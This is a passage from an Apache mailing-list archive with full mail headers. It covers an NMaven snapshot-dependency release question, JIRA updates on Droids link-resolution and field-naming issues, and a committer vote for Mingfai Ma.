required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 26 Oct 2007 19:42:53 +0000 Received: by rv-out-0910.google.com with SMTP id k20so905761rvb for <[email protected]>; Fri, 26 Oct 2007 12:42:32 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; bh=a2K8AsNLtKc4kwJunhUr7eDD30U1jQokLtUxL3VGCis=; b=hPVG60c/ePmSr6LdINg/LpC4gXeFNOe67c/ecsgYz2JiYWUMI3UOqHwpdtV7ll90SMmxTBPffW0vMJLnKyiX0Zek42m313gbjJEgIIxpsqXW50zoq4Kz7IMviQzZ6Kjd1glQEyqyvl/fX4b7cO5fBhfGl8rChL7PVe8KNgLYB4k= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:references; b=j5xxka4JuhbQpBA2aeXT1ZHLQDJlgsMh5GJ6Nz8IsCVQZeo5YDyVut7vKa8WI0UM7e18PwdoJwjA+OOAXxTJB4Tig05iuTDBDlfB2sAzW6FXH3Bex3lWK/QctUeFUzx5wuJw3E8/y36GDlkX4z4GVxHDB+oFwkBJ9P3axPvl3lc= Received: by 161.129.204.104 with SMTP id x14mr1728331rvh.1193427680408; Fri, 26 Oct 2007 12:41:20 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Fri, 26 Oct 2007 12:41:20 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 26 Oct 2007 12:41:20 -0700 From: "Shane Isbell" <[email protected]> To: [email protected] Subject: Re: Snapshot Dependency In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_Part_4733_20222392.1193427680388" References: <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------=_Part_4733_20222392.1193427680388 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline The VS2005 addin uses the Maven embedder from Maven 2.1-SNAPSHOT. The embedder from 2.0.x doesn't work, so there is no release version that we can use. Shane On 10/26/07, Evan Worley <[email protected]> wrote: > > Do they associated components need shapshot dependencies? Or is there a > stable version they can depend on? > > -Evan > > On 10/26/07, Shane Isbell <[email protected]> wrote: > > > > The VS2005 addin and associated components require Maven snapshot > > dependencies, which is a problem for doing an NMaven release. One > thought > > I > > had was to disable any IDE components and then do a release. These > > components which have the snapshot dependencies are included under the > > VS2005 profile anyway, so it would be just doing a default build. > > Thoughts? > > > > Shane > > > ------=_Part_4733_20222392.1193427680388--
From [email protected] Tue Jun 02 20:27:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90598 invoked from network); 2 Jun 2009 20:27:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2009 20:27:18 -0000 Received: (qmail 90881 invoked by uid 500); 2 Jun 2009 20:27:30 -0000 Delivered-To: [email protected] Received: (qmail 90837 invoked by uid 500); 2 Jun 2009 20:27:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90810 invoked by uid 99); 2 Jun 2009 20:27:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Jun 2009 20:27:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Jun 2009 20:27:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E169F234C055 for <[email protected]>; Tue, 2 Jun 2009 13:27:07 -0700 (PDT) Message-ID: <936645312.1243974427922.JavaMail.jira@brutus> Date: Tue, 2 Jun 2009 13:27:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (DROIDS-45) Fail to resolve outlink correctly In-Reply-To: <1093377227.1238676013090.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-45?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Mingfai Ma updated DROIDS-45: ----------------------------- Attachment: (was: LinkResolver.java) > Fail to resolve outlink correctly > --------------------------------- > > Key: DROIDS-45 > URL: https://issues.apache.org/jira/browse/DROIDS-45 > Project: Droids > Issue Type: Bug > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-45b.patch, DROIDS-45c.patch > > > I've encountered several cases that outlinks are not extracted correctly. Most are cause by the use of URI.resolve(). > 1. For a base URI of new URI("http://www.domain.com"), <a href="test.html">test.html</a> will be resolved to http://www.domain.comtest.html > 2. For a base URI of new URI("http://www.domain.com/index.php"), <a href="?test=true">test with param</a> will be resolved to http://www.domain.com/?test=true > 3. for <a href="http://www.yahoo.com\n">line break!</a>, URL.resolve will throw exception. And in a browser, it can resolves the URI. (remarks: I didn't check if this scenario affect the default Tika/NekoHTML parsing. ) > I suspect there are many different scenarios, many of them are probably caused by non-standard usage. (but a crawler has to handle non-standard usage in order to function) Obviously, we cannot cater every case, and I suggest to consider a resolve failure as a bug if a link works in a Mozilla browser but not in Droids LinkExtractor. > this issue is related to the LinkExtractor created in DROIDS-8 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jun 02 20:27:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90601 invoked from network); 2 Jun 2009 20:27:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2009 20:27:18 -0000 Received: (qmail 90893 invoked by uid 500); 2 Jun 2009 20:27:30 -0000 Delivered-To: [email protected] Received: (qmail 90839 invoked by uid 500); 2 Jun 2009 20:27:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90816 invoked by uid 99); 2 Jun 2009 20:27:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Jun 2009 20:27:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Jun 2009 20:27:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E4317234C1E6 for <[email protected]>; Tue, 2 Jun 2009 13:27:07 -0700 (PDT) Message-ID: <1963402031.1243974427933.JavaMail.jira@brutus> Date: Tue, 2 Jun 2009 13:27:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (DROIDS-45) Fail to resolve outlink correctly In-Reply-To: <1093377227.1238676013090.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-45?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Mingfai Ma updated DROIDS-45: ----------------------------- Attachment: (was: LinkResolverTests.java) > Fail to resolve outlink correctly > --------------------------------- > > Key: DROIDS-45 > URL: https://issues.apache.org/jira/browse/DROIDS-45 > Project: Droids > Issue Type: Bug > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-45b.patch, DROIDS-45c.patch > > > I've encountered several cases that outlinks are not extracted correctly. Most are cause by the use of URI.resolve(). > 1. For a base URI of new URI("http://www.domain.com"), <a href="test.html">test.html</a> will be resolved to http://www.domain.comtest.html > 2. For a base URI of new URI("http://www.domain.com/index.php"), <a href="?test=true">test with param</a> will be resolved to http://www.domain.com/?test=true > 3. for <a href="http://www.yahoo.com\n">line break!</a>, URL.resolve will throw exception. And in a browser, it can resolves the URI. (remarks: I didn't check if this scenario affect the default Tika/NekoHTML parsing. ) > I suspect there are many different scenarios, many of them are probably caused by non-standard usage. (but a crawler has to handle non-standard usage in order to function) Obviously, we cannot cater every case, and I suggest to consider a resolve failure as a bug if a link works in a Mozilla browser but not in Droids LinkExtractor. > this issue is related to the LinkExtractor created in DROIDS-8 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jun 02 20:27:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90607 invoked from network); 2 Jun 2009 20:27:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2009 20:27:18 -0000 Received: (qmail 90989 invoked by uid 500); 2 Jun 2009 20:27:30 -0000 Delivered-To: [email protected] Received: (qmail 90862 invoked by uid 500); 2 Jun 2009 20:27:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90807 invoked by uid 99); 2 Jun 2009 20:27:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Jun 2009 20:27:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Jun 2009 20:27:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C1BEC234C044 for <[email protected]>; Tue, 2 Jun 2009 13:27:07 -0700 (PDT) Message-ID: <684877580.1243974427792.JavaMail.jira@brutus> Date: Tue, 2 Jun 2009 13:27:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (DROIDS-45) Fail to resolve outlink correctly In-Reply-To: <1093377227.1238676013090.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-45?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Mingfai Ma updated DROIDS-45: ----------------------------- Attachment: DROIDS-45c.patch added a LinkNormalizer to normalize url, e.g. {code} assertEquals("http://www.apache.org/style.css", normalizer.normalize("http://www.apache.org/../style.css")); assertEquals("http://www.apache.org/style.css", normalizer.normalize("http://www.apache.org/../../style.css")); assertEquals("http://www.apache.org/style.css", normalizer.normalize("http://www.apache.org/../../../style.css")); assertEquals("http://www.apache.org/style.css", normalizer.normalize("http://www.apache.org/./style.css")); {code} See the test case for more examples. Some changes are made to the LinkResolver to use the normalizer and some other changes such as removed the wrong space escaping. > Fail to resolve outlink correctly > --------------------------------- > > Key: DROIDS-45 > URL: https://issues.apache.org/jira/browse/DROIDS-45 > Project: Droids > Issue Type: Bug > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-45b.patch, DROIDS-45c.patch > > > I've encountered several cases that outlinks are not extracted correctly. Most are cause by the use of URI.resolve(). > 1. For a base URI of new URI("http://www.domain.com"), <a href="test.html">test.html</a> will be resolved to http://www.domain.comtest.html > 2. For a base URI of new URI("http://www.domain.com/index.php"), <a href="?test=true">test with param</a> will be resolved to http://www.domain.com/?test=true > 3. for <a href="http://www.yahoo.com\n">line break!</a>, URL.resolve will throw exception. And in a browser, it can resolves the URI. (remarks: I didn't check if this scenario affect the default Tika/NekoHTML parsing. ) > I suspect there are many different scenarios, many of them are probably caused by non-standard usage. (but a crawler has to handle non-standard usage in order to function) Obviously, we cannot cater every case, and I suggest to consider a resolve failure as a bug if a link works in a Mozilla browser but not in Droids LinkExtractor. > this issue is related to the LinkExtractor created in DROIDS-8 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Tue Jun 02 20:27:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90683 invoked from network); 2 Jun 2009 20:27:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 2 Jun 2009 20:27:19 -0000 Received: (qmail 91057 invoked by uid 500); 2 Jun 2009 20:27:31 -0000 Delivered-To: [email protected] Received: (qmail 91031 invoked by uid 500); 2 Jun 2009 20:27:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91021 invoked by uid 99); 2 Jun 2009 20:27:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Jun 2009 20:27:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 02 Jun 2009 20:27:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id DED6C234C052 for <[email protected]>; Tue, 2 Jun 2009 13:27:07 -0700 (PDT) Message-ID: <898534416.1243974427911.JavaMail.jira@brutus> Date: Tue, 2 Jun 2009 13:27:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (DROIDS-45) Fail to resolve outlink correctly In-Reply-To: <1093377227.1238676013090.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-45?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Mingfai Ma updated DROIDS-45: ----------------------------- Attachment: (was: DROIDS-45.patch) > Fail to resolve outlink correctly > --------------------------------- > > Key: DROIDS-45 > URL: https://issues.apache.org/jira/browse/DROIDS-45 > Project: Droids > Issue Type: Bug > Components: core > Affects Versions: 0.01 > Reporter: Mingfai Ma > Attachments: DROIDS-45b.patch, DROIDS-45c.patch > > > I've encountered several cases that outlinks are not extracted correctly. Most are cause by the use of URI.resolve(). > 1. For a base URI of new URI("http://www.domain.com"), <a href="test.html">test.html</a> will be resolved to http://www.domain.comtest.html > 2. For a base URI of new URI("http://www.domain.com/index.php"), <a href="?test=true">test with param</a> will be resolved to http://www.domain.com/?test=true > 3. for <a href="http://www.yahoo.com\n">line break!</a>, URL.resolve will throw exception. And in a browser, it can resolves the URI. (remarks: I didn't check if this scenario affect the default Tika/NekoHTML parsing. ) > I suspect there are many different scenarios, many of them are probably caused by non-standard usage. (but a crawler has to handle non-standard usage in order to function) Obviously, we cannot cater every case, and I suggest to consider a resolve failure as a bug if a link works in a Mozilla browser but not in Droids LinkExtractor. > this issue is related to the LinkExtractor created in DROIDS-8 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jun 05 06:57:10 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8870 invoked from network); 5 Jun 2009 06:57:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2009 06:57:09 -0000 Received: (qmail 91375 invoked by uid 500); 5 Jun 2009 06:57:21 -0000 Delivered-To: [email protected] Received: (qmail 91322 invoked by uid 500); 5 Jun 2009 06:57:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91312 invoked by uid 99); 5 Jun 2009 06:57:21 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 06:57:21 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mo-p05-ob.rzone.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 06:57:07 +0000 X-RZG-AUTH: :I3wBe1Onbu02NkHlDbrpfe8kNG+qAh4Y0eqmCwRzFEVCdcWSt57tNbG1bHzEpg== X-RZG-CLASS-ID: mo05 Received: from [161.129.204.104] (76.Red-88-22-27.staticIP.rima-tde.net [161.129.204.104]) by post.strato.de (fruni mo7) (RZmta 18.38) with ESMTP id 6061b1l556mnFk for <[email protected]>; Fri, 5 Jun 2009 08:56:47 +0200 (MEST) Subject: [Vote] Mingfai Ma as committer From: Thorsten Scherler <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Date: Fri, 05 Jun 2009 08:56:46 +0200 Message-Id: <1244185006.14878.4.camel@kenny> Mime-Version: 1.0 X-Mailer: Evolution 161.129.204.104 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org The droids pmc proposes Mingfai Ma to become a new committer. (S)he has offered great contributions follows them through with the feeback given from the developers. https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=true&reporterSelect=specificuser&reporter=mingfai Please cast your votes. The voting period will end a week from today. http://www.timeanddate.com/counters/customcounter.html?year=2009&month=06&day=12 salu2 -- Thorsten Scherler <thorsten.at.apache.org> Open Source <consulting, training and solutions> From [email protected] Fri Jun 05 07:18:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14085 invoked from network); 5 Jun 2009 07:18:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2009 07:18:19 -0000 Received: (qmail 6187 invoked by uid 500); 5 Jun 2009 07:18:31 -0000 Delivered-To: [email protected] Received: (qmail 6141 invoked by uid 500); 5 Jun 2009 07:18:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6131 invoked by uid 99); 5 Jun 2009 07:18:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 07:18:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 07:18:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 5EE1F234C004 for <[email protected]>; Fri, 5 Jun 2009 00:18:07 -0700 (PDT) Message-ID: <910220566.1244186287374.JavaMail.jira@brutus> Date: Fri, 5 Jun 2009 00:18:07 -0700 (PDT) From: "Mingfai Ma (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Issue Comment Edited: (DROIDS-49) Make LinkTask.started non-final, and rename it propertly In-Reply-To: <1366440428.1240513530449.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/DROIDS-49?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12702061#action_12702061 ] Mingfai Ma edited comment on DROIDS-49 at 6/5/09 12:16 AM: ----------------------------------------------------------- changed to "Major" after a deeper thought, it is wrong to call it "started". It is the task creation date, and after creation, a task is put into a queue, and only when the task is polled from the queue and being processed, it could be called as "started". just rename it to "created" or "createdDate"? besides, the lastModifiedDate is not called lastModified, so the use of "Date" suffix need to be reviewed. I personally like "created" and "lastModified" without the Date suffix but both are fine as long as it is standardized. was (Author: mingfai): changed to "Major" after a deeper thought, it is wrong to call it "started". It is the task creation date, and after creation, a task is put into a queue, and only when the task is polled from the queue and being processed, it could be called as "started". just rename it to "created" or "createdDate"? besides, the lastModifiedDate is not called lastModified, so the use of "Date" prefix need to be reviewed. I personally like "created" and "lastModified" without the Date prefix but both are fine as long as it is standardized. > Make LinkTask.started non-final, and rename it propertly > -------------------------------------------------------- > > Key: DROIDS-49 > URL: https://issues.apache.org/jira/browse/DROIDS-49 > Project: Droids > Issue Type: Improvement > Components: core > Reporter: Mingfai Ma > Attachments: DROIDS-49.patch > > > started/taskDate should be final, but it caused a problem to me in doing unit test that a huge number of LinkTask are to be created with different started date > my suggestion: > 1. make started non-final > 2. add a constructor > by design, the 2nd one is better. but in terms of maintainability, it's better not to add too many constructors. > The HttpCore design has some examples (http header of response?! sth like that) that final attributes are not necessarily be made as final/immune. I suggest just to make the started field non-final. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Fri Jun 05 08:05:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 24072 invoked from network); 5 Jun 2009 08:05:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2009 08:05:20 -0000 Received: (qmail 59281 invoked by uid 500); 5 Jun 2009 08:05:33 -0000 Delivered-To: [email protected] Received: (qmail 59237 invoked by uid 500); 5 Jun 2009 08:05:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59227 invoked by uid 99); 5 Jun 2009 08:05:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 08:05:32 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mta.juntadeandalucia.es) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 08:05:24 +0000 Received: from [161.129.204.104] (helo=mail.juntadeandalucia.es) by guadix4.juntadeandalucia.es with esmtps (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from <[email protected]>) id 1MCUQB-0002JX-NW for [email protected]; Fri, 05 Jun 2009 10:05:03 +0200 Received: from [161.129.204.104] by mail.juntadeandalucia.es with esmtpa (Exim 4.69) (envelope-from <[email protected]>) id 1MCUQB-00034g-Gf for [email protected]; Fri, 05 Jun 2009 10:05:03 +0200 Subject: Re: [Vote] Mingfai Ma as committer From: Thorsten Scherler <[email protected]> To: [email protected] In-Reply-To: <1244185006.14878.4.camel@kenny> References: <1244185006.14878.4.camel@kenny> Content-Type: text/plain; charset=utf-8 Date: Fri, 05 Jun 2009 10:12:47 +0200 Message-Id: <1244189567.6894.2.camel@panic> Mime-Version: 1.0 X-Mailer: Evolution 161.129.204.104 Content-Transfer-Encoding: quoted-printable X-Spam-Score: -99 X-Spam-Score-Int: -99 X-Virus-Checked: Checked by ClamAV on apache.org On Fri, 2009-06-05 at 08:56 +0200, Thorsten Scherler wrote: > The droids pmc proposes Mingfai Ma to become a new committer.=20 ... > Please cast your votes. The voting period will end a week from today. +1 salu2 --=20 Thorsten Scherler <thorsten.at.apache.org> Open Source Java <consulting, training and solutions> Sociedad Andaluza para el Desarrollo de la Sociedad=20 de la Informaci=C3=B3n, S.A.U. (SADESI) From [email protected] Fri Jun 05 12:09:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11549 invoked from network); 5 Jun 2009 12:09:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2009 12:09:35 -0000 Received: (qmail 60760 invoked by uid 500); 5 Jun 2009 12:09:47 -0000 Delivered-To: [email protected] Received: (qmail 60715 invoked by uid 500); 5 Jun 2009 12:09:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <droids-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60705 invoked by uid 99); 5 Jun 2009 12:09:47 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 12:09:47 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gx0-f219.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Jun 2009 12:09:36 +0000 Received: by gxk19 with SMTP id 19so2437180gxk.12 for <[email protected]>; Fri, 05 Jun 2009 05:09:15 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=VZJdZH51i9zTxUzlD1Xz4NoIUfpqYBBIzTi19Xi53yY=; b=qzwFEuDilK1IHT0QL85r6Mw6JWchCkPv2jeBgHeckaJTb2/C4cfKAL8KFT3h928U+J bqhDLy/Wvqa2sI+XsFbvHsYY7GUqG9FEnCxcrjYBn+3hDL7JKBv/i0BQFSQTF+LHQNwN D6NOxK7+1lEe0QQtmt3lZVgOSw0hSFoJfH+xg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=rkCwF5H+bdplQSMKXFwsGroNfne0Jk2p3tAM4RCUb29UXGfvU3twmjn/FmvC4JKhcL FMqkMkzgo1MQGZKUelXP4ybQ3tqTammVxcRJbSx6NNP5ICsori+TIywv8bYHhE7G5Eib hQGcGPFZaOnGB9djQLedsAfg2aji43o6cWusI= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id s4mr5963451ybb.81.1244203755298; Fri, 05 Jun 2009 05:09:15 -0700 (PDT) In-Reply-To: <1244185006.14878.4.camel@kenny> References: <1244185006.14878.4.camel@kenny> Date: Fri, 5 Jun 2009 08:09:15 -0400 Message-ID: <[email protected]> Subject: Re: [Vote] Mingfai Ma as committer From: Ryan McKinley <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org +1 On Fri, Jun 5, 2009 at 2:56 AM, Thorsten Scherler<[email protected]> wrot= e: > The droids pmc proposes Mingfai Ma to become a new committer. > > (S)he has > offered great contributions follows them through with the feeback given > from the developers. > > https://issues.apache.org/jira/secure/IssueNavigator.jspa?reset=3Dtrue&re= porterSelect=3Dspecificuser&reporter=3Dmingfai > > Please cast your votes. The voting period will end a week from today. > > http://www.timeanddate.com/counters/customcounter.html?year=3D2009&month= =3D06&day=3D12 > > salu2 > -- > =EF=BB=BFThorsten Scherler <thorsten.at.apache.org> > Open Source <consulting, training and solutions> > > From [email protected] Fri Jun 05 13:52:57 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56895 invoked from network); 5 Jun 2009 13:52:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Jun 2009 13:52:57 -0000 Received: (qmail 22076 invoked by uid 500); 5 Jun 2009 13:53:09 -0000 Delivered-To: [email protected] Received: (qmail 22030 invoked by uid 500); 5 Jun 2009 13:53:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: 